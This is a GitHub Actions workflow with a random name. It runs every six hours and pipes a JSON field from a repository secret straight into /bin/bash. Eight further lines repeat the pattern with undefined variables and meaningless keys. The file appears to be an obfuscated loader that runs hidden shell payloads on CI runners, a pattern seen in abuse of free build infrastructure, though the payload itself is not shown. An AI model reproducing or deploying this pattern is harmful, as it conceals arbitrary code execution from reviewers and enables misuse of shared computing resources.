name: taidutd

on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taidutd
        env:
          d54: ${{ secrets.d54 }}
        run: |
          echo $d54 | jq -r .ct4501 | /bin/bash
          echo $jby74 | jq -r .vaqf2475 | /bin/bash
          echo $wm17 | jq -r .gjqq5546 | /bin/bash
          echo $pmoyv11906 | jq -r .qoj53989 | /bin/bash
          echo $saf8 | jq -r .ag38372 | /bin/bash
          echo $x604 | jq -r .as7111 | /bin/bash
          echo $j82 | jq -r .y045 | /bin/bash
          echo $zu98209 | jq -r .lg7 | /bin/bash
          echo $m90210 | jq -r .aau1 | /bin/bash

